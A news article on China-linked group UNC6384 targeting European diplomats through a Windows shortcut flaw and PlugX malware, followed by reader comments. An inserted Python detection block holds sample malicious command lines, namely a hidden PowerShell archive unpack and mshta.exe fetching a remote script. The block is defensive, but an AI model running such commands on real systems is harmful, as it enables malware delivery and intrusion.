China-Linked Hackers Target Europe: New Windows Flaw Exposes Diplomats

A China-linked hacking group has been targeting European diplomatic missions using a new Windows vulnerability. The attackers sent phishing emails disguised as official European Commission and NATO meeting invitations. When the links were clicked, they deployed the PlugX malware, which gives the attackers complete control over infected systems. Cybersecurity experts warn this campaign aligns with China's intelligence-gathering objectives regarding European defense cooperation.

Key Points: China Hackers UNC6384 Target European Diplomats via Windows Flaw

  • UNC6384 exploited unpatched Windows LNK vulnerability CVE-2025-9491 across European nations
  • Hackers used diplomatic-themed phishing emails about NATO and EU meetings
  • Attack chain deployed PlugX malware enabling full system control and data theft
  • Malware evolved rapidly from 700KB to just 4KB for better stealth

China-linked hackers target European diplomatic missions using new Windows flaw

China-linked hackers UNC6384 exploit Windows LNK flaw to target European diplomatic missions with PlugX malware, reveals Arctic Wolf cybersecurity report.

"The continued targeting of European diplomatic entities highlights China's growing cyber espionage focus - Arctic Wolf"

New Delhi, Nov 2

A China-linked hacking group named UNC6384 has been blamed for a new cyberattack campaign targeting European diplomatic and government organisations, according to a report by cybersecurity firm Arctic Wolf.

The attacks took place between September and October 2025 and exploited an unpatched Windows shortcut (LNK) vulnerability, as reported by The Hacker News.

The victims of the attack include diplomatic organizations in Hungary, Belgium, Italy, and the Netherlands, as well as government agencies in Serbia.

Arctic Wolf said the hackers used spear-phishing emails containing links that appeared related to European Commission meetings, NATO workshops, and diplomatic coordination events.

When victims clicked the links, they were led to malicious LNK files designed to exploit the Windows flaw, tracked as CVE-2025-9491 with a CVSS score of 7.0.

Once opened, these files launched a complex attack chain that ended with the deployment of PlugX malware, a dangerous remote access trojan also known by names like Destroy RAT, Korplug, and SOGU.

The malware allows hackers to control infected systems, record keystrokes, upload or download files, and gather detailed information from the compromised computers.

Researchers explained that the LNK files trigger a PowerShell command that extracts a hidden archive containing three files: a legitimate Canon printer utility, a malicious DLL file called CanonStager, and an encrypted PlugX payload.

The hackers use a technique called DLL side-loading to make the malware look like a harmless programme.

The CanonStager malware has been evolving rapidly. Arctic Wolf found that its file size had dropped from 700 KB in early September to just 4 KB by October 2025, showing that the hackers are working to make it smaller, stealthier, and harder to detect.

In some cases, the attackers also used HTML Application (HTA) files that loaded external JavaScript from cloudfront[.]net domains to deliver the malware.
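Added example, not from the article or Arctic Wolf's report: a Python detector that turns the chain described above into three heuristics (Explorer-launched PowerShell with a hidden window unpacking an archive, an unsigned DLL loaded from beside an executable in a user-writable folder, and mshta.exe reaching a cloudfront.net host) and runs them over constructed Sysmon-style events. The Canon utility and DLL file names, the Temp path and the cloudfront host are placeholders, since the article does not give them.

```python
import re
from dataclasses import dataclass

@dataclass
class Event:
    kind: str            # "process" (creation) or "imageload" (DLL loaded)
    image: str           # full path of the process executable
    parent: str = ""     # parent executable (process events)
    cmdline: str = ""    # command line (process events)
    module: str = ""     # loaded DLL path (imageload events)
    signed: bool = True  # DLL carries a valid signature (imageload events)

USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads)\\", re.I)
EXTRACT = re.compile(r"expand-archive|\btar\b|\.zip\b|\.rar\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)

def base(path):
    return path.lower().rsplit("\\", 1)[-1]

def detect(events):
    findings = []  # (rule, image) pairs for events matching the described chain
    for e in events:
        if e.kind == "process":
            # Rule 1: shortcut opened from Explorer starts a hidden PowerShell that unpacks an archive.
            if base(e.image) == "powershell.exe" and base(e.parent) == "explorer.exe" \
                    and HIDDEN.search(e.cmdline) and EXTRACT.search(e.cmdline):
                findings.append(("lnk_powershell_unpack", e.image))
            # Rule 2: mshta.exe fetching content from a cloudfront.net host (the HTA variant).
            if base(e.image) == "mshta.exe" and "cloudfront.net" in e.cmdline.lower():
                findings.append(("hta_cloudfront_loader", e.image))
        elif e.kind == "imageload":
            # Rule 3: executable in a user-writable folder loads an unsigned DLL from its own directory.
            exe_dir, dll_dir = (p.lower().rsplit("\\", 1)[0] for p in (e.image, e.module))
            if not e.signed and exe_dir == dll_dir and USER_WRITABLE.search(e.image):
                findings.append(("dll_sideload_userdir", e.image))
    return findings

TMP = r"C:\Users\alice\AppData\Local\Temp"  # constructed path
SAMPLE_EVENTS = [  # constructed sample telemetry, not from a real incident
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe",
          cmdline=f"powershell.exe -w hidden -c Expand-Archive {TMP}\\invite.zip {TMP}"),
    Event("imageload", TMP + r"\canon_util.exe",            # placeholder for the Canon utility
          module=TMP + r"\canonstager.dll", signed=False),  # placeholder DLL name
    Event("process", r"C:\Windows\System32\mshta.exe", parent=r"C:\Windows\explorer.exe",
          cmdline="mshta.exe https://d0000000.cloudfront.net/loader.js"),
    Event("imageload", r"C:\Windows\System32\svchost.exe",
          module=r"C:\Windows\System32\ntdll.dll", signed=True),
]
```

Run `detect(SAMPLE_EVENTS)` to see the three constructed malicious events flagged and the signed system DLL load left alone.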

This shows that UNC6384 continues to refine its methods to stay ahead of security defences.

Cybersecurity researchers have also linked UNC6384 to another China-based hacking group known as Mustang Panda, known for targeting government and diplomatic entities across Europe and Asia.

The group has been seen deploying memory-resident versions of PlugX, referred to as SOGU.SEC.

Experts say the campaign aligns with China's intelligence-gathering goals, particularly to monitor European defense cooperation, policy coordination, and alliance strength.

Microsoft has confirmed that its Defender antivirus can detect and block this type of attack, while Smart App Control adds another protection layer by blocking malicious files downloaded from the internet.

According to Arctic Wolf, the continued targeting of European diplomatic entities highlights China's growing cyber espionage focus on understanding the inner workings of European alliances and defence strategies.

- IANS


Reader Comments

Rohit P
The file size dropping from 700KB to just 4KB in a month is terrifying! Shows how quickly these hackers are evolving. Our cybersecurity teams in India need to stay several steps ahead. Maybe we should invest more in indigenous security solutions rather than depending only on foreign software.
Arjun K
Not surprised at all. China has been consistently targeting strategic information globally. Remember how they targeted Indian power grids and defense networks? This is their standard modus operandi. European countries are finally waking up to what we've been facing for years.
Sarah B
Working in cybersecurity in Delhi, I appreciate the detailed technical breakdown. The DLL side-loading technique using Canon printer utility is clever but dangerous. Organizations need better employee training - no clicking suspicious links, even if they look official!
Vikram M
While China's cyber aggression is concerning, I wish our media would also highlight India's own cybersecurity capabilities. We have excellent white-hat hackers and security researchers who are doing great work. Let's not always portray ourselves as victims.
Michael C
The timing is interesting - right when Europe is strengthening its defense cooperation. China clearly wants to monitor these developments closely. India should use this opportunity to strengthen cybersecurity partnerships with European nations. 🤝